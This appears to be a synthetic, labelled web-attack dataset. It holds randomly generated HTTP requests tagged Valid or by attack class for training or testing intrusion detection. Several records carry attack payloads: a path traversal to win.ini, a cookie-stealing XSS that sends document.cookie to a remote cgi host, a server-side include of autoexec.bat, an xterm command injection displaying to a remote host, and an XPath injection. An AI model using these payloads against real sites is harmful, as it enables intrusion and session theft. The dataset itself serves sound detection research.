~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12700
Start - Id: 12799
class: Valid
GET /fQ/v8u8O.dll?YLRty=oWiKzlMrdU&ed7eb=h%248olse2&ousdeeeya3edil=t1Dep.OCR&TaSejD=bwgetEhulnmadmin2&jMxp_6Qx3=pHu6dwmtosd&jtod=is5&72scyEnosi=eoeaFeWEtc6&seydw4a=jhb&n5KepdnueRrwb=o%3Cn3system&pe4dh=eeuery3tpdeesY&xi=2279597&shi6=e%40e5tw.lCcf&i8cscrct8aseeml=eqsernteediH&tq=heSA&aigaefdIhrogbr=Jnpsftpcejbgsound HTTP/1.0
Host: 170.251.134.192
Connection: keep-alive
Accept: image/*
Accept-Charset: *
Accept-Encoding: identity
Accept-Language: nHtt-etTcanr;q=0.9, o-t;q=0.1
Cache-Control: no-transform
Client-ip: 249.160.166.238
Cookie: eu6nvaunRsn=sOaa2)xl~a;uttexnrArkstmO=0705841763;cE=f utSpassthrunfoxb tus
Cookie2: $Version="0"
Date: Tue, 07 Apr 09 24:40:35 UTC
ETag: "mropXh@_ajA7wC5"
Expect: 100-continue
From: tibfhrt@6ra7.com
If-Modified-Since: Sun, 19 Mar 06 10:54:38 UTC
If-Unmodified-Since: Sun, 22 Feb 04 10:47:11 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 10 Feb 07 11:37:21 GMT
Max-Forwards: 1878
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: 498n hlmtmd=7eifG
Range: 880687-,10-
Referer: /t5am/LnEngaia/taua97n/nmenhhr/cdtneOe.jsp
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/1.8 (compatible; MSIE 5.1; Linux i386; kdogsmeaf; yOdeZ8tv)
UA-CPU: Sparc
UA-Disp: 718,169,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 3992x9312
Via: 7.7 57.86.250.85:9697, 9.5 40.148.147.59:936, FTP/2.3 www.skksE.jpeg
Transfer-Encoding: identity
Upgrade: DoR/2.1, rahogo/2.6
Warning: 738 www.mdRbith.jpeg "5erngdnraionsLeaa6n" 
X-Forwarded-For: 129.36.3.102
X-Serial-Number: 1697647823
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12799
Start - Id: 36227
class: PathTransversal
GET /error/\..\..\..\..\winnt\win.ini? HTTP/1.0
Host: www.ethc.uk
Connection: tgahIae
Accept: */*;q=0.9
Accept-Charset: cp-950, euc-tw, iso-2022-jp;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 58.131.95.224
Cookie: lmk=14323658;9vEaruSX9s=sVh;X4djkYd=ma;4enlcberds=wSN6AsmXMGN;yeareaeTe=dgobject4;6EhauscAidfowh1=s
Cookie2: $Version="298"
Date: Tue, 09 Mar 04 16:18:16 GMT
ETag: W/"02fTRqFrC56Driy1u8a"
Expect: 100-continue
From: maal4k@enPaImpyhd.st
If-Modified-Since: Thu, 06 Nov 08 13:40:13 UTC
If-Unmodified-Since: Mon, 29 Aug 05 11:11:18 UTC
If-Match: "KF@Qh6Npq.Dbhdld7V"
If-None-Match: *
If-Range: "G8UZdAebuuG3M_5-"
Max-Forwards: 5
MIME-Version: 3.4
Pragma: sDooBra=gs
Proxy-Authorization: Basic YXVkY2VyeDo4U2Ft
Authorization: jgtf ycvyehcy=no4v1
Range: 183-
Referer: http://insuj.it/id5h4o/ei5ctn.aspx
TE: deflate,chunked;q=0.3
Trailer: Accept-Language
User-Agent: oBdESskSa http://www.recr.ch
UA-CPU: MIPS
UA-Disp: 399,5892,8
UA-OS: Windows NT
Via: HTTP/9.5 216.210.143.188
Transfer-Encoding: wco0ln; tmumx=othb
Upgrade: eEi/2.2, aafe/8.5, gceaso/0.6, aWa/4.3, tiau/5.9
X-Forwarded-For: 190.138.69.239
X-Serial-Number: 779670420209
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36227
Start - Id: 46675
class: XSS
GET /ReoprMabooh/fesfidegw.jpg?rdb=a%7CEpassthrunrnodesyso9script%25+x&Wmb2FX7X=%25%2Bnvbscript&9vboatlr7i5=ust&noafu0t0=s4YGNkl&rfSi=eDET7NZ&tc=oesaos&ltujleRfs=eCY&R_tnIW5UM=fiFZ9v36tx&PDMdu=240421&SHeit=741&aiKct1itt=0328731&nreamlawbwW4oh=i&to4rNt=7 HTTP/1.1
Host: 248.132.17.35
Connection: keep-alive
Accept: */*
Accept-Charset: cp-936;q=0.4, iso-8859-5, euc-jp, koi8
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.1
Cache-Control: max-stale=44563
Client-ip: 122.1.27.92
Cookie: ssXsTobraoE=&{[document.location.replace    ('http://www.ilniar.com/cgi-bin/sigetiie.cgi'+document.cookie);]};
Cookie2: $Version="2"
Date: Tue, 02 Mar 10 04:28:28 GMT
ETag: W/"tFAOV_hpgZ8i-tSn05"
Expect: fimat=ainyve;psc8tsts=moiva
From: Dped3ih@fknm2tsceo.gov
If-Modified-Since: Thu, 15 Jul 04 16:45:00 UTC
If-Unmodified-Since: Sat, 12 Jul 08 10:26:09 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 19 Sep 07 14:16:00 CET
Max-Forwards: 83
MIME-Version: 0.9
Pragma: purs='h'
Proxy-Authorization: 5taRoo rnn5=c3tA9
Authorization: oalarb xejt=6onr
Range: 012087-,-8
Referer: /h3oee0/h8ii/piofrin/loaioiS/ter4.tiff
TE: trailers,chunked
Trailer: If-Modified-Since
User-Agent: Mozilla/5.8 (Machintosh; U; PPC 8.5; se-Uo; rv:1.0.9) Gecko/72215191
UA-CPU: x86
UA-Disp: 598,1386,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 630x4242
Via: 5.3 www.leiz.htm, auL/1.0 108.151.227.226
Transfer-Encoding: deflate
Upgrade: ms8pnA/8.6, 2r5c/1.7, a6d/6.2, Hgagks/0.3, dwe/0.6
Warning: 215 182.199.44.60 "ndteejhnqoKy4mea" "Sun, 18 Oct 09 09:17:52 UTC"
X-Forwarded-For: 249.226.25.170
X-Serial-Number: 19077842196498
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46675
Start - Id: 40692
class: SSI
GET /i2ltuiieoet5Swohvn/dCUlLInTys8/rh/e4gtp/i5Luz-v.php3?saammeer=88095&8rnEkurwuptN=iln.%40FXBAY&jm2sgniiataara=nenigEdg3inKO&or=i9tfV1P&abilntt4t=04&tcttntaTcn=eg5m&ulvar1T_ER=13&QgjY0=deeott4zd&b7Znxps=%3C%21--%23include+++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+--%3E&madstgn=Va&lexparUyutCob6e=s0Sf4vKO&r0=1&nNeuse=hNarzlae&mbhNhnB61wAP=rw HTTP/1.0
Host: www.aeitlbr.com
Connection: keep-alive
Accept: */*
Accept-Charset: ks_c_5601-1987;q=0.8, macintosh, iso-8859-8-i
Accept-Encoding: deflate;q=0.0, gzip;q=0.4, identity;q=0.1, identity;q=0.8
Accept-Language: *
Cache-Control: Hazoyrbo='finu'
Client-ip: 194.79.71.60
Cookie: narb6l=hJpei;o3cb0hj0e=rhyn
Cookie2: $Version="75"
Date: Wed, 30 Jun 04 19:11:53 UTC
ETag: W/"Q9aTXVoVbOZVKvMF38o."
Expect: uEou=4suairW;30pi
If-Modified-Since: Fri, 18 May 07 09:39:28 GMT
If-Unmodified-Since: Sat, 17 Mar 07 20:31:22 UTC
If-Match: *
If-Range: "TR6vuNPLi5qE97cdkWG"
Max-Forwards: 931
Pragma: no-cache
Proxy-Authorization: Digest nc=7f42c8bd
Authorization: 7ppar rEyF66=ooa6
Referer: /o6goe.exe
TE: chunked,chunked;q=0.3,trailers
User-Agent: Mozilla/6.1 (X11; U; Unix 3.5; tq-ii; rv:7.5.0) Gecko/35853870
UA-OS: WinNT
Via: 0.9 www.d4au.jpg, FTP/8.5 www.iaohbuoc.jpg
Transfer-Encoding: gzip
Upgrade: hlowR/6.5, dnzRm/2.0, rferw/1.2, Ennn/3.5, ecMaer/0.5

null

End - Id: 40692
Start - Id: 25396
class: Valid
GET /tnPJY/sal5ansaerdousIud/k9IDYUeN-D/exattEtnodcer3oHsei/AdrI/oeRwbiidozBpetTt8f/hddotdnt7aumwotj/dH6iUs@0C6rperlkIwinnt/oq_KDvPOkgvR/lKS8C/gndAn8to5q9.pl?btyeDso=h+rarLSmhthoAopene&ugB3O.RASVS=31146826&iho8b2t=esnf%3F&hndtufsh=9486&x5jY=t9b1m-&Ft6Bf=nir%2BqeRow%3Foetwl&8htzrhioiQttir=ddnAlxUieei1&Tignmyxehema27=teeeslA6ltce&t@pNKI1G1iframed=asc7Inld&lleNr1e=8JYv9sDaU&aengca9vaTv=nIel%3Ctq8%3FGb&XdSstyleinputL=hjaujpE6eiu%7C%7Ctbs&tghbto0a6fe=e1astdform%24%7C7&etc3qsiasnb=2s&eeenm5=2 HTTP/1.0
Host: 111.221.129.8:80
Connection: keep-alive
Accept: */*
Accept-Charset: koi8;q=0.4, x-mac-chinesesimp;q=0.7, iso-8859-3;q=0.9, x-mac-cyrillic;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 45.139.165.17
Cookie: v-t_7adminhttpsy.htaccesI=5;tctkmldneNw= 5a[D4lstym;bE8hv=pe7U7assiic8m7ov;e26yeusbiOrhp=tfXVC;len6ooSl1einnz=[u aaiexmlt4 i
Cookie2: $Version="522"
Date: Sun, 04 Jul 04 20:44:57 UTC
ETag: "8XeR5c2fEm9-Wq4cgX"
Expect: oqn3aldd=txcHa;tiyof
From: drrovE@debi2e.fr
If-Modified-Since: Mon, 30 Mar 09 05:16:09 CET
If-Unmodified-Since: Tue, 18 Nov 08 18:57:51 CET
If-Match: "pAPGMmhZ.1CJQgbHO4_"
If-None-Match: *
If-Range: Fri, 06 Feb 04 01:29:29 CET
Max-Forwards: 0741
MIME-Version: 9.0
Pragma: 94aO=tec4t
Proxy-Authorization: NTLM eGxhbGxibGFwbmFzWGljcnNpaXB0ZTNzZGxzbmhuT2VzYXN0M2hybWI=
Authorization: Basic anhiZHNjOmxyYWtodG9l
Range: 7820-,350834-024
Referer: /gdls9/tmccoAah.asp
TE: trailers,chunked;q=0.8
Trailer: Accept
User-Agent: etRo4xahoo (8En9hZN; yA15yMD9_s; h0WMbo; aUh6Rws1eN)
UA-CPU: x86
UA-Disp: 071,871,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 407x092
Via: FTP/4.9 126.161.32.140:5696
Transfer-Encoding: identity
Upgrade: aer/3.2, cuxRP7/3.1, tvea/5.6, A3e/4.9
Warning: 569 www.t4X4iede.htm "7eueo" "Fri, 30 Apr 10 03:41:56 CET"
X-Forwarded-For: 128.87.150.234
X-Serial-Number: 06104
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25396
Start - Id: 3524
class: Valid
GET /aotjTZrkdnfmmATtovii/wVrieipiochtn/oo2nm/gmaltednjtitt.css?rocnizeett7od=o7oj2no&edop1goi=apn&ZUcKa28Pfnand0d=19522&csnssa8=zGt21tr&y6PQAL=ldTlwget&st=291212082&adrcrK6h=355788&boot.iniY2N7CN0lsDWF=ndi&tSattii8rxu=814377&7Oisqt1inrai6E=pId HTTP/1.1
Host: 194.118.239.171
Connection: close
Accept: image/gif;q=0.0
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: mrzstir-EuotmtR;q=0.5
Cache-Control: min-fresh=9927
Client-ip: 100.5.164.201
Cookie: 7eis=48137;mtDaObewoais=rc:hg;BWQQmeta_libK1G=963;lnesj=rou0nfzl
Cookie2: $Version="18"
Date: Tue, 11 Jul 06 06:15:31 CET
ETag: W/"soakEDI7uEqLVoLk@M"
Expect: bcZe=stMl
From: owdyna@dnrunek0n2.com
If-Modified-Since: Sat, 19 Sep 09 02:54:44 CET
If-Unmodified-Since: Fri, 12 Jun 09 12:54:42 CET
If-Match: "CoABRlvId.GAcfwfPBG"
If-None-Match: "eg4SHC70@IuystyTSZn5"
If-Range: Fri, 19 Oct 07 15:06:31 GMT
Max-Forwards: 1944
MIME-Version: 1.6
Pragma: cZeedpjx=2hdlt
Proxy-Authorization: Digest response="eFaFDEbfbED7Ace2E02FFEf6ee2a8BAF"
Authorization: Digest uri=/dE1d/Srnmisr.bin
Range: 0-91,8335-51366
Referer: http://IA9ar5a.ch/dwtAknYt/ssdAhM/eohtdmis.jpeg
TE: deflate,trailers,gzip;q=0.1
Trailer: Connection
User-Agent: aFfboin/1.9.6
UA-CPU: MIPS
UA-Disp: 845,505,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 337x1386
Via: r7g/1.8 209.201.106.177, 3.2 67.199.112.34
Transfer-Encoding: compress
Upgrade: slh/6.3
Warning: 996 www.oioeoa.png "henuSrMevtewo9Rnoa2h" "Sun, 29 Nov 09 11:37:16 CET"
X-Forwarded-For: 233.242.107.236
X-Serial-Number: 69462429797
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3524
Start - Id: 24368
class: Valid
GET /onvJKl/ByGYV3l2xW9j/eupelont/czI9ZKaLsqmfFM/otailwarosImoeOlsa/nne/tq/hSme0lrghiahgDelcwze/ne4YDtuv5hfe/neeOXsyxdrcuesgipi/nin/jK6rcpformbpcZx-.j.shtml?Htwnj88Fh=i6ohgn0daa&csdae69ma=rsmmsn%3Bemruaon&1mandNQ-KF=414&sam4=oHFr9y&bid=uF9A_F HTTP/1.1
Host: 208.106.156.0
Connection: close
Accept: audio/*;q=0.5, application/zip, application/zip;q=0.3
Accept-Charset: x-mac-greek;q=0.8, iso-2022-jp;q=0.5
Accept-Encoding: *
Accept-Language: mxukn83-os6hwy;q=0.1, oihpee-ito, waamt7-thgxmoez;q=0.4, kar6-gvnlrmEo
Cache-Control: only-if-cached
Client-ip: 112.202.157.195
Cookie: hH6lcxiundscewe=50;andservicesnullY=rGf2x;eiw7annzatshfna=mttaone ;eoxs=MCegio
Cookie2: $Version="50"
Date: Tue, 13 Apr 04 23:13:06 CET
ETag: W/"iGg4GyFoonVM8sn"
Expect: 100-continue
From: ske7oetj@eo7inee.cz
If-Modified-Since: Thu, 06 Apr 06 17:32:48 CET
If-Unmodified-Since: Mon, 31 Jul 06 19:56:53 UTC
If-Match: "jy4UQtHnJekAtCv"
If-None-Match: "tGqeiG1xIVW_UdV"
If-Range: "6cmzok9EcMllWfHOmOkb"
Max-Forwards: 5461
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: NTLM c29ib2V0ZXB6dGpzc2k2bm1vcnJoYWV0SXQwZ3RvczZ0bg==
Authorization: Oueba TSkes=e8Hse
Range: 127-
Referer: http://www.ghtko.biz/u6an/redrn/oGnt5s/i6toioi.cgi
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/7.1 (compatible; Konqueror/1.4; WinNT; atennxsAr; Novnnte)
UA-CPU: MIPS
UA-Disp: 801,8735,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 352x5203
Via: 1.4 89.97.253.227, 9zEag/6.6 23.167.63.185, HTTP/8.7 205.170.43.249
Transfer-Encoding: identity
Upgrade: dl2nol/1.8, hopeH/5.6, tvmd/4.2
Warning: 317 www.kcoono.tiff "csd2erdpoarTetors" 
X-Forwarded-For: 73.2.112.190
X-Serial-Number: 6737813475044771
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 24368
Start - Id: 43254
class: OsCommanding
GET /x9opt@Elnn/e9cysw1hUiNne/cc.yvGO10@d7M/document2ig/sRrN6rEk.baZ1@tpihD.jsp?Ho6H4nurro6n=eas&Sac9g4fromt=dnI5XDDf&6cedn4=ecm%3Ep&lReh=re2&8Qj2J2v=IscriptBcf+eo9&ak4noeti34=%250A+++xterm++++-display+++++www.etieonge.com%3A0.0&attlcuomeut=p%3EoOLe%2B&uhia0eay=tgDtPZhFe3&hOetlbdz1=evt&ldpuaohLwhx=9942456&-ozlT9sock_streamLc=mLGUqw&wttfnts2myeRi=fseixmlRnullPt&nothno=an&oagtrvjQqbsnaQE=Aw%405 HTTP/1.1
Host: 185.180.93.199
Connection: close
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-store
Client-ip: 234.82.248.6
Cookie: eWce=ataad(6emc;hessuno4sdca=iru1toeB
Cookie2: $Version="5"
Date: Tue, 12 Feb 08 12:26:40 GMT
ETag: W/"4OevjYPAXE2q_Wfy7"
Expect: 100-continue
From: w5itei@2re1ofAi.st
If-Modified-Since: Fri, 23 Jan 09 07:51:43 UTC
If-Unmodified-Since: Sat, 29 Nov 08 07:59:35 CET
If-Match: "Qh1YHB@JYy05@Czu"
If-None-Match: *
If-Range: Fri, 16 Oct 09 22:04:47 GMT
Max-Forwards: 88
MIME-Version: 8.0
Pragma: efro='teo'
Proxy-Authorization: Digest response="0B3cEb0aBbFc900Db7cC68fE50d55Ca6"
Authorization: NTLM dHNUZXhoQXN5YWRlZWVpaGcwZ25kYWNuYWhldWhibmRtZTBzdTRo
Range: 6235-,3-
Referer: http://www.npnb.cz/gndva/ewlxaOnc/odtsaa1/tawcd.php4
TE: chunked;q=0.1,trailers,trailers
Trailer: If-Range
User-Agent: seibra8
UA-CPU: 68000
UA-Disp: 9170,0027,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 115x099
Via: 31z7/5.5 www.iczutte1.gif, 8.4 3.2.111.114, fdjnys/6.4 www.s8aal.jpg
Transfer-Encoding: compress
Upgrade: lnphe/4.9
Warning: 865 www.tCxceo.shtml "dydtrSr7Wtth" "Fri, 09 Jul 04 12:15:54 GMT"
X-Forwarded-For: 228.91.246.96
X-Serial-Number: 855673274232810386
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43254
Start - Id: 25793
class: Valid
GET /QEftpVJdropN7R0a3P/qs4slCamtsoDnirepNe/rYBb/syvtc33/srhnesoetf/y6SOn@b/nZ_P2MdhIxVnl.pl?lhcaR=uaeDg&o5omac=7892&eaiemiSielikR=geree&ieeoledla3ee9nN=3o&zeVXLQ2T=aRaatxaeethooiEge&berdhJ7ablh=anbomduyT9hi&liso=tYUtt4Y&rhehync4trdetn=nF2l&dog=en%5Dhsaop&hnxdc9iohnew=323&_1cglWwindow.open4cstdin=s%5Col+2a%7C6dttR&xde=5&ednsaoesp1hmOr4=3016 HTTP/1.1
Host: www.iCwi2uct.gov:80
Connection: close
Accept: text/html, audio/x-wav;q=0.1, video/quicktime;q=0.4
Accept-Charset: euc-cn, iso-8859-8, iso-8859-8;q=0.7, iso-8859-8-i, x-mac-cyrillic
Accept-Encoding: 
Accept-Language: toO-e2
Cache-Control: min-fresh=680
Client-ip: 89.254.34.165
Cookie: ocIkYuIEaiefV=357521;Hm6=85432437;nabptf=308861;s3aawre7w7=4650547
Cookie2: $Version="08"
Date: Thu, 09 Sep 04 01:44:16 UTC
ETag: W/"5RHt55FH9QQdc7hfmap"
Expect: 100-continue
From: wcr0oelc@nhee9nt.fr
If-Modified-Since: Mon, 13 Jul 09 06:08:37 UTC
If-Unmodified-Since: Thu, 11 Aug 05 20:02:07 CET
If-Match: "htejDvvkKVFGVaViP"
If-None-Match: "2rvq7oBmLzRF8Qa"
If-Range: *
Max-Forwards: 8
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: NTLM bWxvaGhtdEhmdDB3amhtZXdOc3lHbmpubmd0NGJjVDhhVHM3czRzbDAyWG0=
Authorization: NTLM c25UeFJ1Mmh3eWlpcHNjZG5zcG9vdGxudE5kYjVlaGV5ZzJlZWV1c2VVN28=
Range: 644-,-02
Referer: /bsYcg/anpx1Hh/IhohnUs/yaoe/e7ykhHo.jpg
TE: deflate;q=0.4,chunked,deflate
Trailer: User-Agent
User-Agent: vVfSokb-5P http://www.lfoTu2.org
UA-CPU: Sparc
UA-Disp: 9911,6209,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 291x574
Via: HTTP/8.6 71.101.100.62
Transfer-Encoding: deflate
Upgrade: wga/3.1, Wienee/8.7, tle/0.5, sc5O3p/8.0, atnnea/5.9
Warning: 825 0.153.179.180:61 "TfhhisrhLuspeaNcn" "Fri, 29 May 09 09:24:00 GMT"
X-Forwarded-For: 186.228.205.221
X-Serial-Number: 63082151043081
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25793
Start - Id: 17639
class: Valid
GET /dk8HVRf/0C3da/hmAE7ZuXvc5yXlVPaI@/Albetr3/zsjE65r4hO/hcwtmtEpyta1tev7ii0/imbasdkzai7m/ev5YC5Mb6@GhA4Vc/mcVsamek9_AfGl/8accept0Kda.js?Ejsamk-i0uWtelnet3=tmtht&ogame=sNdui&tseawdf=7&o6iawjiisotr=r-&gSuFu%uvXHhome=18&le=78945&gxwmCEsarerEs=Oge%3C+&mano4e=e&ewulhuw5psre=yu5 HTTP/1.1
Host: 213.249.99.209
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1252;q=0.3, iso-8859-4;q=0.7, windows-1258;q=0.6, iso-8859-1;q=0.0, iso-8859-7
Accept-Encoding: *;q=0.3
Accept-Language: glS-ibwtq
Cache-Control: max-stale=50
Client-ip: 138.232.104.112
Cookie: esnepsei00d2a=o=oej;rcphOb7aenuhr0D=loehtpassashrqst>t;r7tniAgosy9d=pAa3oEbe;Cthrjhxoitdx=tU0FG
Cookie2: $Version="1"
Date: Thu, 17 Sep 09 21:38:29 UTC
ETag: "DJCqJurVPqjQ5b522q"
Expect: gm2utTo
From: spzl@sWeElsewt.de
If-Modified-Since: Mon, 21 Mar 05 08:20:23 CET
If-Unmodified-Since: Sun, 18 Nov 07 22:14:10 GMT
If-Match: *
If-None-Match: "B1ysax7l-NP2Aeej0.rG"
If-Range: Sun, 25 Nov 07 03:20:42 GMT
Max-Forwards: 585
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: e4mliA tprrabsi=tr5guv5
Authorization: Digest nonce
Range: 3-7,-050092
Referer: http://bmeemfs.gov/etxireoN.nsf
TE: chunked;q=0.1
Trailer: Accept-Encoding
User-Agent: art5tCdoph/7.8
UA-CPU: MIPS
UA-Disp: 004,3622,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 519x8664
Via: 8.9 253.57.72.181, 5.8 www.t2iisofm.jpeg, 3.9 42.62.13.246:445
Transfer-Encoding: ho7ud; ibytV=7tael
Upgrade: tlNe/2.8, mgiaa/3.5
Warning: 037 www.tflm.htm:40429 "fajas1yd" 
X-Forwarded-For: 9.161.93.196
X-Serial-Number: 6572400
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 17639
Start - Id: 48917
class: XPathInjection
GET /5xwRsKFuIefcul81/cLury5lefn4rdoefile/-dposition9mPA5iframeU6_nO/evalX74HE0dS1Fk/9-/hatauszaiieaeh/WXvmochaWgW0/oH9YfbyOu4g/tLg-Z2UGrAz/Dccs5sm0b/eZD.4SpYGEDwtO./Sqisteayt6ooqn.html?uoesec4=nLhLoX&aomuaas=28097++++or++++i%2Fm7anoj%2FeIikg%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D6%5D+or+++8903%3D HTTP/1.0
Host: 218.235.69.75
Connection: diti
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: gzip, deflate;q=0.3, gzip;q=0.8
Accept-Language: hrn4o-ufmti;q=0.3, 8tsn3-oi
Cache-Control: max-stale
Client-ip: 33.184.179.137
Cookie: oslis4er6=elsmailu>Am;ymiol2IhiEei=42;lqOrnuhyln=na;hRwget6t1pAmy=m6OLziFNB;hh2ektuvn4otp0o=@eMEhtoppmo0
Cookie2: $Version="504"
Date: Tue, 13 Sep 05 06:04:35 GMT
ETag: W/"DEMXpzK3ZKUSrwpqiv9"
Expect: 100-continue
From: adatne4h@font.be
If-Modified-Since: Fri, 06 Aug 04 01:19:57 UTC
If-Unmodified-Since: Mon, 17 Nov 08 12:39:03 UTC
If-Match: *
If-None-Match: "Mx5c7grfboP61gEoTKpR"
If-Range: *
Max-Forwards: 2362
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Digest response="f4fa2C3be9dCA3EBbB36Ea92bAdd9Da1"
Authorization: eavt tn6ctr=enrnic4r
Range: 87-22
Referer: http://www.ihxrhoa.net/azgnl.png
TE: gzip;q=0.7,trailers,gzip;q=0.4
Trailer: Warning
User-Agent: Mozilla/3.0 (Windows; U; Win98 9.9; n5-na; rv:4.2.5) Gecko/46086832
UA-CPU: PowerPC
UA-Disp: 8730,583,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 508x349
Via: 7.8 www.dsrsom5.js:8, 0.0 www.cEwfnnr.htm, 1.7 229.46.126.177
Transfer-Encoding: identity
Upgrade: ltr/8.5, jsTkgd/0.2
Warning: 099 www.eSitghtc.htm "2nttveexd" "Tue, 21 Sep 04 15:34:20 CET"
X-Forwarded-For: 1.220.148.94
X-Serial-Number: 467543929806
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48917
Start - Id: 12953
class: Valid
GET /a3xj1krVZHb3hn_AHrE/nwmxSK/tXetUt/awgaugHe/3dnsyrosa9m/of3cVrsQnIrwvvAoX@W/-JTnodeqvyahA40E.nsf?dhE=te&tooro9co3peoA=Tdnw%3Fl0t%3En%2Fp&rri=48714&orsoovnrahbvu=um9gnnepdoc&ieqeDaalaiNouu=03849&Z.Mh=rs3toeiEmets6vh9ne&rtn4ohhITd6=ini&dyso=hG&beEIaethuzhrjls=w%3Eno&7Ott0num=9986&avtgo8sAprneyr=4&chprhYotoRr=767&sycna=-8childr&ht=hua%5D+Mwi%3EsT&dmdaROaapdw8ew=149 HTTP/1.0
Host: www.mawsRehd.com
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 237.177.46.104
Cookie: aetuhu5luo9=5vulhrptne Yl';uVRH=oOdo;ecOosaq8roi=umethrpnoscript);scsghtaaTcsjood=arC2Uu6x85Ka;ieed=rklj;h4e=5connectoiet9arfe$m
Cookie2: $Version="04"
Date: Sun, 22 Aug 04 22:29:33 CET
ETag: "4G_.Z88SAafFTM5_"
Expect: 100-continue
From: I3hnmy@0fhsF.net
If-Modified-Since: Tue, 16 Mar 10 18:17:16 CET
If-Unmodified-Since: Wed, 28 Apr 04 01:12:49 GMT
If-Match: *
If-None-Match: "4mvufpFCFEA0coT"
If-Range: Fri, 26 Aug 05 24:07:08 CET
Max-Forwards: 49
MIME-Version: 7.7
Pragma: ao='y'
Proxy-Authorization: NTLM ZG5lYW1sb25pb0s4cnJUdW5vVG5UdGlvc2V0dGFOdEZ6
Authorization: antpso eoU7os02=nffDr
Range: -742
Referer: http://www.bbomu.biz/l1lw/dhDe.fgf
TE: gzip;q=0.2,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/7.5 (Machintosh; U; PPC 0.2; te-ci; rv:4.9.1) Gecko/93912143
UA-CPU: Sparc
UA-Disp: 5556,649,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 3851x1864
Via: HTTP/6.1 www.Tstz9.css, 1.5 158.24.235.148, HTTP/8.0 231.244.35.240
Transfer-Encoding: identity
Upgrade: wsRo6a/8.5
Warning: 659 11.248.81.124 "abilo" 
X-Forwarded-For: 182.133.25.200
X-Serial-Number: 194126085
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12953
Start - Id: 31828
class: Valid
GET /i9havingmm4/UcA2/znZp9Ct-/tlissnw/fS5c6HC/csor8fv/a6b.3FJ-mbuboyC-MC/dB@t.v0XD7pSH.jpg?t3unrhner2=Sil&eyaM=810780 HTTP/1.1
Host: 139.221.142.66:80
Connection: gtvesdn
Accept: video/mpeg;q=0.7
Accept-Charset: x-mac-arabic, iso-8859-15, iso-8859-4, iso-8859-9;q=0.9
Accept-Encoding: deflate, compress;q=0.2
Accept-Language: lrneuT-bircoo, nT-iin, wa-hpaO, 3n-unyt, ua-tti4i
Cache-Control: no-cache
Client-ip: 61.83.163.230
Cookie: nro4no3sosrtjtc=sgnshomeluxbhu;dlogwyDeQ2aRP=mCtr@;ieiazrjEdasax6=0aqcd;oewmrz5p5utAoC=ydPK7TKVBDlH
Cookie2: $Version="83"
Date: Sat, 23 Feb 08 18:33:12 UTC
ETag: W/"gde8Dk70UHJfStlf"
Expect: ptsnay
From: iinTn@uosdcs8h.fr
If-Modified-Since: Tue, 27 Jan 09 15:09:02 GMT
If-Unmodified-Since: Tue, 01 Apr 08 05:51:00 UTC
If-Match: "pjdFxsATnMxi2DlHQ"
If-None-Match: *
If-Range: Sun, 08 Oct 06 22:40:37 CET
Max-Forwards: 2
MIME-Version: 6.4
Pragma: no-cache
Proxy-Authorization: Basic cnJ3bjpkNmE5SWU=
Authorization: Basic T291aWVzejp0eWQ0Zw==
Range: 79-9576,4502-8,7-
Referer: /hae6se6e/3emhela.mpg
TE: trailers
Trailer: Accept
User-Agent: clmlgeinoennsDtrgTe
UA-CPU: PowerPC
UA-Disp: 423,7753,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 540x2072
Via: HTTP/7.1 207.190.6.10
